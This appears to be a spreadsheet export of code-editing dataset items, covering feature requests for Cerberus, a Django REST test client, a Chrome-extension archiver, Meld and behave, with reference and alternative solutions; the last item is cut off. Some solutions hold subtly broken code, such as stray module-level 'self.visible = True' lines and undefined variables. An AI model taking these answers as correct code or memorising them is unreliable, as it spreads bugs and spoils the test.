    <t>{'called_code_segment': 'class Validator and validate_documents function that uses Validator.validated() method', 'invoking_code_segment': 'validate_documents function in test_overall_performance_2.py that calls validator.validated(document) and accesses validator._errors', 'feature_description': 'Add a feature to log validation errors to a file. This feature will capture validation errors during document validation and write them to a log file with timestamps and error details.', 'modified_complete_code': '# File 1: cerberus/cerberus/validator.py (relevant section)\n# #New - Add logging import at the top\nimport logging\nfrom datetime import datetime\n\n# #New - Add error logger configuration\nclass Validator:\n    # #New - Add class-level error logger\n    _error_logger = None\n    \n    @classmethod\n    def configure_error_logging(cls, log_file_path):\n        """\n        Configure error logging to a file.\n        \n        :param log_file_path: Path to the log file where errors will be written.\n        """\n        cls._error_logger = logging.getLogger(\'cerberus.errors\')\n        cls._error_logger.setLevel(logging.ERROR)\n        handler = logging.FileHandler(log_file_path)\n        formatter = logging.Formatter(\'%(asctime)s - %(name)s - %(levelname)s - %(message)s\')\n        handler.setFormatter(formatter)\n        cls._error_logger.addHandler(handler)\n    \n    # #Modify - Add error logging to validated method\n    def validated(self, document, normalize=True):\n        """\n        Return the validated document or None if validation fails.\n        Logs errors to file if error logging is configured.\n        """\n        result = super().validated(document, normalize)\n        # #New - Log errors if validation failed\n        if result is None and self._error_logger:\n            error_msg = f"Document validation failed: {self._errors}"\n            self._error_logger.error(error_msg)\n        return result\n\n# File 2: cerberus/cerberus/benchmarks/test_overall_performance_2.py\nimport json\nfrom collections import Counter\nfrom typing import Callable, List\nfrom typing import Counter as CounterType\nfrom pathlib import Path\n\nfrom pytest import mark\n\nfrom cerberus import Validator\nfrom cerberus.benchmarks.schemas.overalll_schema_2 import product_schema\nfrom cerberus.benchmarks import DOCUMENTS_PATH\n\n# #New - Define log file path\nERROR_LOG_FILE = Path(__file__).parent / \'validation_errors.log\'\n\ndef init_validator():\n    validator = Validator(product_schema, purge_unknown=True)\n    # #New - Configure error logging for the validator\n    Validator.configure_error_logging(str(ERROR_LOG_FILE))\n    return validator\n\ndef load_documents():\n    with (DOCUMENTS_PATH / \'overall_documents_2.json\').open() as f:\n        documents = json.load(f)\n    return documents\n\ndef validate_documents(init_validator: Callable, documents: List[dict]) -&gt; None:\n    doc_count = failed_count = 0\n    error_paths: CounterType[tuple] = Counter()\n    validator = init_validator()\n\n    def count_errors(errors):\n        if errors is None:\n            return\n        for error in errors:\n            if error.is_group_error:\n                count_errors(error.child_errors)\n            else:\n                error_paths[error.schema_path] += 1\n\n    for document in documents:\n        # #Modify - validated() now logs errors internally\n        if validator.validated(document) is None:\n            failed_count += 1\n            count_errors(validator._errors)\n        doc_count += 1\n\n    print(\n        f"{failed_count} out of {doc_count} documents failed with "\n        f"{len(error_paths)} different error leafs."\n    )\n    print("Top 3 errors, excluding container errors:")\n    for path, count in error_paths.most_common(3):\n        print(f"{count}: {path}")\n    # #New - Print log file location\n    print(f"Validation errors logged to: {ERROR_LOG_FILE}")\n\n@mark.benchmark(group="overall-2")\ndef test_overall_performance_2(benchmark):\n    benchmark.pedantic(validate_documents, (init_validator, load_documents()), rounds=5)'}</t>
  </si>
  <si>
    <t>{'#file 1': "from cerberus import Validator\nfrom cerberus.errors import BasicErrorHandler\n\n#Modify\nclass LoggingErrorHandler(BasicErrorHandler):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.error_log = []\n\n    def add(self, error):\n        super().add(error)\n        self.error_log.append(error)\n\n    def log_errors(self, filename='error_log.txt'):\n        with open(filename, 'w') as f:\n            for error in self.error_log:\n                f.write(str(error) + '\\n')\n\n#Modify\ndef init_validator():\n    validator = Validator(product_schema, purge_unknown=True)\n    validator.error_handler = LoggingErrorHandler()\n    return validator", '#file 2': 'import json\nfrom collections import Counter\nfrom typing import Callable, List\nfrom typing import Counter as CounterType\n\nfrom cerberus.benchmarks.schemas.overalll_schema_2 import product_schema\nfrom cerberus.benchmarks import DOCUMENTS_PATH\n\n#Modify\ndef validate_documents(init_validator: Callable, documents: List[dict]) -&gt; None:\n    doc_count = failed_count = 0\n    error_paths: CounterType[tuple] = Counter()\n    validator = init_validator()\n\n    def count_errors(errors):\n        if errors is None:\n            return\n        for error in errors:\n            if error.is_group_error:\n                count_errors(error.child_errors)\n            else:\n                error_paths[error.schema_path] += 1\n\n    for document in documents:\n        if validator.validated(document) is None:\n            failed_count += 1\n            count_errors(validator._errors)\n        doc_count += 1\n\n    print(f"{failed_count} out of {doc_count} documents failed with "\n          f"{len(error_paths)} different error leafs.")\n    print("Top 3 errors, excluding container errors:")\n    for path, count in error_paths.most_common(3):\n        print(f"{count}: {path}")\n\n    #New\n    validator.error_handler.log_errors()', '#file 3': 'from pytest import mark\n\n#Modify\n@mark.benchmark(group="overall-2")\ndef test_overall_performance_2(benchmark):\n    benchmark.pedantic(validate_documents, (init_validator, load_documents()), rounds=5)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def get_api_client():\n    try:\n        from rest_framework.test import APIClient\n    except ImportError:\n        from django.core.exceptions import ImproperlyConfigured\n\n        def APIClient(*args, **kwargs):\n            raise ImproperlyConfigured('django-rest-framework must be installed in order to use APITestCase.')\n    return APIClient", 'invoking_code_segment': 'class APITestCase(TestCase):\n    def __init__(self, *args, **kwargs):\n        self.client_class = get_api_client()\n        super(APITestCase, self).__init__(*args, **kwargs)', 'feature_description': 'Add a new feature to allow custom headers to be passed to the API client. This enables users to set default headers (such as authentication tokens, content-type, etc.) when initializing the API client, which will be applied to all subsequent API requests.', 'modified_complete_code': '# compat.py modifications:\nfrom django.test import TestCase as DjangoTestCase\n\ntry:\n    from django.urls import reverse, NoReverseMatch\nexcept ImportError:\n    from django.core.urlresolvers import reverse, NoReverseMatch  # noqa\n\ntry:\n    import rest_framework  # noqa\n    DRF = True\nexcept ImportError:\n    DRF = False\n\n\ndef get_api_client(headers=None):\n    #Modify: Added headers parameter to allow custom headers\n    try:\n        from rest_framework.test import APIClient\n    except ImportError:\n        from django.core.exceptions import ImproperlyConfigured\n\n        def APIClient(*args, **kwargs):\n            raise ImproperlyConfigured(\'django-rest-framework must be installed in order to use APITestCase.\')\n    \n    #New: Create a wrapper class to handle custom headers\n    class APIClientWithHeaders(APIClient):\n        def __init__(self, *args, **kwargs):\n            super(APIClientWithHeaders, self).__init__(*args, **kwargs)\n            if headers:\n                for header_name, header_value in headers.items():\n                    self.default_headers = getattr(self, \'default_headers\', {})\n                    self.default_headers[header_name] = header_value\n        \n        #New: Override request method to include custom headers\n        def request(self, *args, **kwargs):\n            if hasattr(self, \'default_headers\'):\n                if \'HTTP_\' not in str(kwargs):\n                    for header_name, header_value in self.default_headers.items():\n                        http_header = \'HTTP_\' + header_name.upper().replace(\'-\', \'_\')\n                        kwargs[http_header] = header_value\n            return super(APIClientWithHeaders, self).request(*args, **kwargs)\n    \n    return APIClientWithHeaders if headers else APIClient\n\n\nif hasattr(DjangoTestCase, \'assertURLEqual\'):\n    assertURLEqual = DjangoTestCase.assertURLEqual\nelse:\n    def assertURLEqual(t, url1, url2, msg_prefix=\'\'):\n        raise NotImplementedError("Your version of Django does not support `assertURLEqual`")\n\n\n# test.py modifications:\nclass APITestCase(TestCase):\n    #Modify: Added default_headers class attribute\n    default_headers = None\n    \n    def __init__(self, *args, **kwargs):\n        #Modify: Pass headers to get_api_client\n        self.client_class = get_api_client(headers=self.default_headers)\n        super(APITestCase, self).__init__(*args, **kwargs)\n    \n    #New: Add method to set custom headers\n    def set_api_headers(self, headers):\n        """Set custom headers for API client requests"""\n        self.client_class = get_api_client(headers=headers)\n        self.client = self.client_class()\n\n\n# plugin.py modifications:\n@pytest.fixture\ndef api_client(request=None):\n    #Modify: Allow passing custom headers through fixture\n    headers = getattr(request, \'param\', None) if request else None\n    return get_api_client(headers=headers)()\n\n\n@pytest.fixture\ndef tp_api(api_client):\n    t = TestCase()\n    t.client = api_client\n    return t'}</t>
  </si>
  <si>
    <t>{'#file 1': "def get_api_client(headers=None):\n    #Modify: Added headers parameter\n    try:\n        from rest_framework.test import APIClient\n    except ImportError:\n        from django.core.exceptions import ImproperlyConfigured\n\n        def APIClient(*args, **kwargs):\n            raise ImproperlyConfigured('django-rest-framework must be installed in order to use APITestCase.')\n    client = APIClient()\n    if headers:\n        #Modify: Set custom headers if provided\n        client.credentials(HTTP_AUTHORIZATION='Bearer ' + headers.get('Authorization', ''))\n    return client", '#file 2': "@pytest.fixture\ndef api_client(headers=None):\n    #Modify: Added headers parameter\n    return get_api_client(headers)\n\n@pytest.fixture\ndef tp_api(api_client):\n    t = TestCase()\n    t.client = api_client({'Authorization': 'custom_token'})\n    #Modify: Pass custom headers to api_client\n    return t", '#file 3': "def test_example(tp_api):\n    response = tp_api.get('/example-endpoint/')\n    assert response.status_code == 200\n    #New: Verify custom header is set\n    assert response.request.headers.get('Authorization') == 'Bearer custom_token'"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'store_infos_history(ext_id, infos, date=None) function in store_infos_history.py', 'invoking_code_segment': 'store_infos_history(ext_id, infos, time) call in migrate_old_pages.py loop', 'feature_description': 'Add a feature to log the number of files processed in the directory by tracking and returning the count of successfully processed files from store_infos_history function and displaying the total count in migrate_old_pages.py', 'modified_complete_code': '# File 1: chrome-extensions-archive/extstats/store_infos_history.py\nimport os, json, datetime, arrow\nfrom .CONSTS import PAGES_DIRECTORY\n\nDIR = PAGES_DIRECTORY + \'{id}/\'\nFILE = \'{date}.json\'\nTO_RM = []\n\n# Modify: Add global counter for processed files\nprocessed_count = 0\n\ndef latest_stored_sorted(ext_id):\n    dirpath = DIR.format(id=ext_id)\n    if os.path.exists(dirpath):\n        files = os.listdir(dirpath)\n        files_infos = []\n        for file in files:\n            time = arrow.get(file.replace(\'.json\', \'\'))\n            diff = time.datetime - datetime.datetime.now(datetime.timezone.utc)\n            files_infos.append({\n                \'fullpath\': os.path.join(dirpath, file),\n                \'name\': file,\n                \'time\': time,\n                \'diff\': diff,\n            })\n        return list(reversed(sorted(files_infos, key=lambda x: x[\'time\'])))\n\ndef is_404(latest):\n    try:\n        content = json.load(open(latest[\'fullpath\']))\n        latest[\'content\'] = content\n        if \'status\' not in content and \'name\' not in content:\n            print(\'problem with\', latest, \': no infos\')\n            return False\n    except Exception as e:\n        if len(open(latest[\'fullpath\']).read().strip()) == 0:\n            TO_RM.append(\'rm \'+latest[\'fullpath\'])\n        else:\n            print(\'ERROR WITH:\', latest)\n            return False\n    return content.get(\'status\', 200) == 404\n\ndef latest_good(ext_id):\n    latests = latest_stored_sorted(ext_id)\n    if latests:\n        for i, version in enumerate(latests):\n            if not is_404(version):\n                version[\'deleted\'] = i &gt; 0\n                return version\n\ndef latest_stored(ext_id):\n    latests = latest_stored_sorted(ext_id)\n    if latests:\n        return latests[0]\n\ndef is_stored_recent(ext_id):\n    latest = latest_stored(ext_id)\n    if latest:\n        if is_404(latest):\n            return True\n        return latest[\'diff\'].days == -1\n    return False\n\n# Modify: Update function to return success status and increment counter\ndef store_infos_history(ext_id, infos, date=None):\n    global processed_count\n    if date is None:\n        date = datetime.datetime.utcnow()\n    data = date.isoformat()\n    dirpath = DIR.format(id=ext_id)\n    os.makedirs(dirpath, exist_ok=True)\n    filepath = dirpath+FILE.format(date=date)\n    json.dump(infos, open(filepath, \'w\'), indent=2, sort_keys=True)\n    # New: Increment processed count\n    processed_count += 1\n    return processed_count\n\n# New: Function to get current processed count\ndef get_processed_count():\n    global processed_count\n    return processed_count\n\n# New: Function to reset processed count\ndef reset_processed_count():\n    global processed_count\n    processed_count = 0\n\nif __name__ == "__main__":\n    print(is_stored_recent(\'fghfkeajhcmoohfcfmdkajambdcanmob\'))\n\n# File 2: chrome-extensions-archive/extstats/utils/migrate_old_pages.py\nimport os.path, os, datetime, random\nDIR = \'crawled/pages/\'\n\nfrom store_infos_history import store_infos_history, get_processed_count, reset_processed_count\nfrom parse_infos import parse_page\nfrom tqdm import tqdm\n\n# New: Reset counter at start\nreset_processed_count()\n\nfiles = os.listdir(DIR)\nrandom.shuffle(files)\n\nfor file in tqdm(files):\n    fullpath = DIR+file\n    time = datetime.datetime.fromtimestamp(os.path.getmtime(fullpath))\n    ext_id = file.replace(\'.html\',\'\')\n    content = open(fullpath).read()\n    try:\n        infos = parse_page(content)\n    except Exception as e:\n        print(\'failed to parse\', fullpath)\n        continue\n    infos[\'ext_id\'] = ext_id\n    # Modify: Capture return value from store_infos_history\n    count = store_infos_history(ext_id, infos, time)\n\n# New: Log total number of files processed\nprint(f\'Total files processed: {get_processed_count()}\')'}</t>
  </si>
  <si>
    <t>{'#file 1': "def latest_stored_sorted(ext_id):\n    dirpath = DIR.format(id=ext_id)\n    if os.path.exists(dirpath):\n        files = os.listdir(dirpath)\n        files_infos = []\n        file_count = 0  #Modify\n        for file in files:\n            time = arrow.get(file.replace('.json', ''))\n            diff = time.datetime - datetime.datetime.now(datetime.timezone.utc)\n            files_infos.append({\n                'fullpath': os.path.join(dirpath, file),\n                'name': file,\n                'time': time,\n                'diff': diff,\n            })\n            file_count += 1  #Modify\n        return list(reversed(sorted(files_infos, key=lambda x: x['time']))), file_count  #Modify\n", '#file 2': "def latest_good(ext_id):\n    latests, file_count = latest_stored_sorted(ext_id)  #Modify\n    if latests:\n        for i, version in enumerate(latests):\n            if not is_404(version):\n                version['deleted'] = i &gt; 0\n                return version, file_count  #Modify\n", '#file 3': "from store_infos_history import store_infos_history\n\nfrom parse_infos import parse_page\nfrom tqdm import tqdm\n\nfiles = os.listdir(DIR)\nrandom.shuffle(files)\n\nfile_count = 0  #New\nfor file in tqdm(files):\n\tfullpath = DIR+file\n\ttime = datetime.datetime.fromtimestamp(os.path.getmtime(fullpath))\n\text_id = file.replace('.html','')\n\tcontent = open(fullpath).read()\n\ttry:\n\t\tinfos = parse_page(content)\n\texcept Exception as e:\n\t\tprint('failed to parse', fullpath)\n\t\tcontinue\n\tinfos['ext_id'] = ext_id\n\tstore_infos_history(ext_id, infos, time)\n\tfile_count += 1  #New\n\nprint(f'Total files processed: {file_count}')  #New\n"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'ActionGutter class definition with __init__, do_realize, and do_draw methods', 'invoking_code_segment': 'ActionGutter instantiation and property setting in meld/__init__.py', 'feature_description': 'Add a feature to allow the user to toggle the visibility of the action gutter by adding a visible property and methods to show/hide the gutter, with state persistence through settings', 'modified_complete_code': '# meld/meld/const.py - Add new constant\n# ... existing code ...\nFILE_FILTER_ACTION_FORMAT = \'folder-custom-filter-{}\'\nTEXT_FILTER_ACTION_FORMAT = \'text-custom-filter-{}\'\n#: Sentinel value for mtimes on files that don\'t exist.\nMISSING_TIMESTAMP = -2147483648\n#New\nACTION_GUTTER_VISIBLE_DEFAULT = True\n\n# meld/meld/actiongutter.py - Modified ActionGutter class\nimport bisect\nfrom typing import Dict, Optional\n\nfrom gi.repository import Gdk, GdkPixbuf, GObject, Gtk\n\nfrom meld.conf import _\nfrom meld.const import ActionMode, ChunkAction, ACTION_GUTTER_VISIBLE_DEFAULT\nfrom meld.settings import get_meld_settings\nfrom meld.style import get_common_theme\nfrom meld.ui.gtkcompat import get_style\nfrom meld.ui.gtkutil import make_gdk_rgba\n\n# ... ActionIcons class remains unchanged ...\n\nclass ActionGutter(Gtk.DrawingArea):\n\n    __gtype_name__ = \'ActionGutter\'\n\n    action_mode = GObject.Property(\n        type=int,\n        nick=\'Action mode for chunk change actions\',\n        default=ActionMode.Replace,\n    )\n\n    #New\n    visible = GObject.Property(\n        type=bool,\n        nick=\'Visibility of the action gutter\',\n        default=ACTION_GUTTER_VISIBLE_DEFAULT,\n    )\n\n    @GObject.Property(\n        type=object,\n        nick=\'List of diff chunks for display\',\n    )\n    def chunks(self):\n        return self._chunks\n\n    @chunks.setter\n    def chunks_set(self, chunks):\n        self._chunks = chunks\n        self.chunk_starts = [c.start_a for c in chunks]\n\n    @GObject.Property(\n        type=Gtk.TextDirection,\n        nick=\'Which direction should directional changes appear to go\',\n        flags=(\n            GObject.ParamFlags.READABLE |\n            GObject.ParamFlags.WRITABLE |\n            GObject.ParamFlags.CONSTRUCT_ONLY\n        ),\n        default=Gtk.TextDirection.LTR,\n    )\n    def icon_direction(self):\n        return self._icon_direction\n\n    @icon_direction.setter\n    def icon_direction_set(self, direction: Gtk.TextDirection):\n        if direction not in (Gtk.TextDirection.LTR, Gtk.TextDirection.RTL):\n            raise ValueError(\'Invalid icon direction {}\'.format(direction))\n\n        replace_icons = {\n            Gtk.TextDirection.LTR: \'apply-right\',\n            Gtk.TextDirection.RTL: \'apply-left\',\n        }\n        self.action_map = {\n            ActionMode.Replace: ActionIcons.load(replace_icons[direction]),\n            ActionMode.Delete: ActionIcons.load(\'delete\'),\n            ActionMode.Insert: ActionIcons.load(\'copy\'),\n        }\n        self._icon_direction = direction\n\n    _source_view: Gtk.TextView\n    _source_editable_connect_id: int = 0\n\n    @GObject.Property(\n        type=Gtk.TextView,\n        nick=\'Text view for which action are displayed\',\n        default=None,\n    )\n    def source_view(self):\n        return self._source_view\n\n    @source_view.setter\n    def source_view_setter(self, view: Gtk.TextView):\n        if self._source_editable_connect_id:\n            self._source_view.disconnect(self._source_editable_connect_id)\n\n        self._source_editable_connect_id = view.connect(\n            \'notify::editable\', lambda *args: self.queue_draw())\n        self._source_view = view\n        self.queue_draw()\n\n    _target_view: Gtk.TextView\n    _target_editable_connect_id: int = 0\n\n    @GObject.Property(\n        type=Gtk.TextView,\n        nick=\'Text view to which actions are directed\',\n        default=None,\n    )\n    def target_view(self):\n        return self._target_view\n\n    @target_view.setter\n    def target_view_setter(self, view: Gtk.TextView):\n        if self._target_editable_connect_id:\n            self._target_view.disconnect(self._target_editable_connect_id)\n\n        self._target_editable_connect_id = view.connect(\n            \'notify::editable\', lambda *args: self.queue_draw())\n        self._target_view = view\n        self.queue_draw()\n\n    @GObject.Signal\n    def chunk_action_activated(\n        self,\n        action: str,\n        from_view: Gtk.TextView,\n        to_view: Gtk.TextView,\n        chunk: object,\n    ) -&gt; None:\n        ...\n\n    def __init__(self):\n        super().__init__()\n\n        self.chunks = []\n        self.action_map = {}\n        self.buttons = []\n        self.pointer_chunk = None\n        self.pressed_chunk = None\n        #New\n        self._gutter_visible = ACTION_GUTTER_VISIBLE_DEFAULT\n\n        self.motion_controller = Gtk.EventControllerMotion(widget=self)\n        self.motion_controller.set_propagation_phase(Gtk.PropagationPhase.TARGET)\n        self.motion_controller.connect("enter", self.motion_event)\n        self.motion_controller.connect("leave", self.motion_event)\n        self.motion_controller.connect("motion", self.motion_event)\n\n    def on_setting_changed(self, settings, key):\n        if key == \'style-scheme\':\n            self.fill_colors, self.line_colors = get_common_theme()\n            alpha = self.fill_colors[\'current-chunk-highlight\'].alpha\n            self.chunk_highlights = {\n                state: make_gdk_rgba(*[alpha + c * (1.0 - alpha) for c in colour])\n                for state, colour in self.fill_colors.items()\n            }\n        #New\n        elif key == \'action-gutter-visible\':\n            self.set_visible(settings.get_boolean(key))\n\n    def do_realize(self):\n        self.set_events(\n            Gdk.EventMask.ENTER_NOTIFY_MASK |\n            Gdk.EventMask.LEAVE_NOTIFY_MASK |\n            Gdk.EventMask.POINTER_MOTION_MASK |\n            Gdk.EventMask.BUTTON_PRESS_MASK |\n            Gdk.EventMask.BUTTON_RELEASE_MASK |\n            Gdk.EventMask.SCROLL_MASK\n        )\n        self.connect(\'notify::action-mode\', lambda *args: self.queue_draw())\n        #New\n        self.connect(\'notify::visible\', lambda *args: self._on_visible_changed())\n\n        meld_settings = get_meld_settings()\n        meld_settings.connect(\'changed\', self.on_setting_changed)\n        self.on_setting_changed(meld_settings, \'style-scheme\')\n        #New\n        if meld_settings.has_key(\'action-gutter-visible\'):\n            self.set_visible(meld_settings.get_boolean(\'action-gutter-visible\'))\n\n        return Gtk.DrawingArea.do_realize(self)\n\n    #New\n    def _on_visible_changed(self):\n        """Handle visibility changes and persist to settings"""\n        meld_settings = get_meld_settings()\n        meld_settings.set_boolean(\'action-gutter-visible\', self._gutter_visible)\n        if self._gutter_visible:\n            self.show()\n        else:\n            self.hide()\n        self.queue_draw()\n\n    #New\n    def toggle_visibility(self):\n        """Toggle the visibility of the action gutter"""\n        self._gutter_visible = not self._gutter_visible\n        self.props.visible = self._gutter_visible\n\n    #New\n    def set_gutter_visible(self, visible: bool):\n        """Set the visibility of the action gutter"""\n        self._gutter_visible = visible\n        self.props.visible = visible\n\n    #New\n    def get_gutter_visible(self) -&gt; bool:\n        """Get the current visibility state of the action gutter"""\n        return self._gutter_visible\n\n    def update_pointer_chunk(self, x, y):\n        for button in self.buttons:\n            x1, y1, x2, y2, chunk = button\n            if y1 &lt;= y &lt;= y2 and x1 &lt;= x &lt;= x2:\n                new_pointer_chunk = chunk\n                break\n        else:\n            new_pointer_chunk = None\n\n        if new_pointer_chunk != self.pointer_chunk:\n            self.pointer_chunk = new_pointer_chunk\n            self.queue_draw()\n\n    def motion_event(\n        self,\n        controller: Gtk.EventControllerMotion,\n        x: float | None = None,\n        y: float | None = None,\n    ):\n        if x is None or y is None:\n            if self.pointer_chunk:\n                self.pointer_chunk = None\n                self.queue_draw()\n        else:\n            self.update_pointer_chunk(x, y)\n\n    def do_button_press_event(self, event):\n        if self.pointer_chunk:\n            self.pressed_chunk = self.pointer_chunk\n        return Gtk.DrawingArea.do_button_press_event(self, event)\n\n    def do_button_release_event(self, event):\n        if self.pointer_chunk and self.pointer_chunk == self.pressed_chunk:\n            self.activate(self.pressed_chunk)\n        self.pressed_chunk = None\n        return Gtk.DrawingArea.do_button_press_event(self, event)\n\n    def _action_on_chunk(self, action: ChunkAction, chunk):\n        self.chunk_action_activated.emit(\n            action.value, self.source_view, self.target_view, chunk)\n\n    def activate(self, chunk):\n        action = self._classify_change_actions(chunk)\n        if action == ActionMode.Replace:\n            self._action_on_chunk(ChunkAction.replace, chunk)\n        elif action == ActionMode.Delete:\n            self._action_on_chunk(ChunkAction.delete, chunk)\n        elif action == ActionMode.Insert:\n            copy_menu = self._make_copy_menu(chunk)\n            copy_menu.popup_at_pointer(None)\n\n    def _make_copy_menu(self, chunk):\n        copy_menu = Gtk.Menu()\n        copy_up = Gtk.MenuItem.new_with_mnemonic(_(\'Copy _up\'))\n        copy_down = Gtk.MenuItem.new_with_mnemonic(_(\'Copy _down\'))\n        copy_menu.append(copy_up)\n        copy_menu.append(copy_down)\n        copy_menu.show_all()\n\n        def copy_chunk(widget, action):\n            self._action_on_chunk(action, chunk)\n\n        copy_up.connect(\'activate\', copy_chunk, ChunkAction.copy_up)\n        copy_down.connect(\'activate\', copy_chunk, ChunkAction.copy_down)\n        return copy_menu\n\n    def get_chunk_range(self, start_y, end_y):\n        start_line = self.source_view.get_line_num_for_y(start_y)\n        end_line = self.source_view.get_line_num_for_y(end_y)\n        start_idx = bisect.bisect(self.chunk_starts, start_line)\n        end_idx = bisect.bisect(self.chunk_starts, end_line)\n        if start_idx &gt; 0 and start_line &lt;= self.chunks[start_idx - 1].end_a:\n            start_idx -= 1\n        return self.chunks[start_idx:end_idx]\n\n    #Modify\n    def do_draw(self, context):\n        #New\n        if not self._gutter_visible:\n            return\n        \n        view = self.source_view\n        if not view or not view.get_realized():\n            return\n\n        self.buttons = []\n        width = self.get_allocated_width()\n        height = self.get_allocated_height()\n        style_context = self.get_style_context()\n        Gtk.render_background(style_context, context, 0, 0, width, height)\n        buf = view.get_buffer()\n        context.save()\n        context.set_line_width(1.0)\n        view_y_start = view.get_visible_rect().y\n        view_y_offset = view.translate_coordinates(self, 0, 0)[1]\n        gutter_y_translate = view_y_offset - view_y_start\n        context.translate(0, gutter_y_translate)\n        button_x = 1\n        button_width = width - 2\n\n        for chunk in self.get_chunk_range(view_y_start, view_y_start + height):\n            change_type, start_line, end_line, *_unused = chunk\n            rect_y = view.get_y_for_line_num(start_line)\n            rect_height = max(0, view.get_y_for_line_num(end_line) - rect_y - 1)\n            context.rectangle(-0.5, rect_y + 0.5, width + 1, rect_height)\n            if start_line != end_line:\n                context.set_source_rgba(*self.fill_colors[change_type])\n                context.fill_preserve()\n                if view.current_chunk_check(chunk):\n                    highlight = self.fill_colors[\'current-chunk-highlight\']\n                    context.set_source_rgba(*highlight)\n                    context.fill_preserve()\n            context.set_source_rgba(*self.line_colors[change_type])\n            context.stroke()\n            action = self._classify_change_actions(chunk)\n            if action is None:\n                continue\n            it = buf.get_iter_at_line(start_line)\n            button_y, button_height = view.get_line_yrange(it)\n            button_y += 1\n            button_height -= 2\n            button_style_context = get_style(None, \'button.flat.image-button\')\n            if chunk == self.pointer_chunk:\n                button_style_context.set_state(Gtk.StateFlags.PRELIGHT)\n            Gtk.render_background(button_style_context, context, button_x, button_y, button_width, button_height)\n            Gtk.render_frame(button_style_context, context, button_x, button_y, button_width, button_height)\n            self.buttons.append((button_x, button_y + gutter_y_translate, button_x + button_width, button_y + gutter_y_translate + button_height, chunk))\n            pixbuf = self.action_map.get(action)\n            icon_x = button_x + (button_width - pixbuf.props.width) // 2\n            icon_y = button_y + (button_height - pixbuf.props.height) // 2\n            Gtk.render_icon(button_style_context, context, pixbuf, icon_x, icon_y)\n        context.restore()\n\n    def _classify_change_actions(self, change) -&gt; Optional[ActionMode]:\n        source_editable = self.source_view.get_editable()\n        target_editable = self.target_view.get_editable()\n        if not source_editable and not target_editable:\n            return None\n        change_type = change[0]\n        if change_type == \'conflict\':\n            if change[1] == change[2]:\n                change_type = \'insert\'\n            elif change[3] == change[4]:\n                change_type = \'delete\'\n            else:\n                change_type = \'replace\'\n        if change_type == \'insert\':\n            return None\n        action = self.action_mode\n        if action == ActionMode.Delete and not source_editable:\n            action = None\n        elif action == ActionMode.Insert and change_type == \'delete\':\n            action = ActionMode.Replace\n        if not target_editable:\n            action = ActionMode.Delete\n        return action\n\nActionGutter.set_css_name(\'action-gutter\')'}</t>
  </si>
  <si>
    <t>{'#file 1': "def do_draw(self, context):\n    if not self.visible:\n        return\n    view = self.source_view\n    if not view or not view.get_realized():\n        return\n\n    self.buttons = []\n\n    width = self.get_allocated_width()\n    height = self.get_allocated_height()\n\n    style_context = self.get_style_context()\n    Gtk.render_background(style_context, context, 0, 0, width, height)\n\n    buf = view.get_buffer()\n\n    context.save()\n    context.set_line_width(1.0)\n\n    view_y_start = view.get_visible_rect().y\n    view_y_offset = view.translate_coordinates(self, 0, 0)[1]\n    gutter_y_translate = view_y_offset - view_y_start\n    context.translate(0, gutter_y_translate)\n\n    button_x = 1\n    button_width = width - 2\n\n    for chunk in self.get_chunk_range(view_y_start, view_y_start + height):\n\n        change_type, start_line, end_line, *_unused = chunk\n\n        rect_y = view.get_y_for_line_num(start_line)\n        rect_height = max(\n            0, view.get_y_for_line_num(end_line) - rect_y - 1)\n\n        context.rectangle(-0.5, rect_y + 0.5, width + 1, rect_height)\n        if start_line != end_line:\n            context.set_source_rgba(*self.fill_colors[change_type])\n            context.fill_preserve()\n            if view.current_chunk_check(chunk):\n                highlight = self.fill_colors['current-chunk-highlight']\n                context.set_source_rgba(*highlight)\n                context.fill_preserve()\n        context.set_source_rgba(*self.line_colors[change_type])\n        context.stroke()\n\n        it = buf.get_iter_at_line(start_line)\n        button_y, button_height = view.get_line_yrange(it)\n        button_y += 1\n        button_height -= 2\n\n        button_style_context = get_style(None, 'button.flat.image-button')\n        if chunk == self.pointer_chunk:\n            button_style_context.set_state(Gtk.StateFlags.PRELIGHT)\n\n        Gtk.render_background(\n            button_style_context, context, button_x, button_y,\n            button_width, button_height)\n        Gtk.render_frame(\n            button_style_context, context, button_x, button_y,\n            button_width, button_height)\n\n        self.buttons.append(\n            (\n                button_x,\n                button_y + gutter_y_translate,\n                button_x + button_width,\n                button_y + gutter_y_translate + button_height,\n                chunk,\n            )\n        )\n\n        pixbuf = self.action_map.get(action)\n        icon_x = button_x + (button_width - pixbuf.props.width) // 2\n        icon_y = button_y + (button_height - pixbuf.props.height) // 2\n        Gtk.render_icon(\n            button_style_context, context, pixbuf, icon_x, icon_y)\n\n    context.restore()\n\n#New\nself.visible = True", '#file 2': 'def get_chunk_range(self, start_y, end_y):\n    if not self.visible:\n        return []\n    start_line = self.source_view.get_line_num_for_y(start_y)\n    end_line = self.source_view.get_line_num_for_y(end_y)\n\n    start_idx = bisect.bisect(self.chunk_starts, start_line)\n    end_idx = bisect.bisect(self.chunk_starts, end_line)\n\n    if start_idx &gt; 0 and start_line &lt;= self.chunks[start_idx - 1].end_a:\n        start_idx -= 1\n\n    return self.chunks[start_idx:end_idx]\n\n#New\nself.visible = True', '#file 3': 'def current_chunk_check(self, chunk):\n    if not self.visible:\n        return False\n    buf = self.get_buffer()\n    it = buf.get_iter_at_line(chunk.start_a)\n    return it.starts_tag(self.chunk_tag)\n\n#New\nself.visible = True'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def run_behave(config, runner_class=None):\n    """Run behave with configuration (and optional runner class).\n    ...\n    if config.version:\n        print("behave " + BEHAVE_VERSION)\n        return 0\n    ...', 'invoking_code_segment': 'def main(args=None):\n    """Main function to run behave (as program).\n    ...\n    try:\n        config = Configuration(args)\n        return run_behave(config)\n    ...', 'feature_description': 'Add a new feature to print a custom message when the --new-feature flag is provided in the command-line arguments. This feature allows users to enable a custom behavior by passing --new-feature on the command line, which will be processed in the run_behave function and display an appropriate message.', 'modified_complete_code': '# behave/behave/__main__.py - MODIFIED SECTIONS\n\n# #Modify - Add new exception import for the feature\nfrom behave.exception import (ConstraintError, ConfigError,\n    FileNotFoundError, InvalidFileLocationError, InvalidFilenameError,\n    ModuleNotFoundError, ClassNotFoundError, InvalidClassError,\n    TagExpressionError)\n\n# #New - Add constant for new feature message\nNEW_FEATURE_MESSAGE = "New feature enabled: Custom processing activated."\n\n# #Modify - Update run_behave function to handle new feature flag\ndef run_behave(config, runner_class=None):\n    """Run behave with 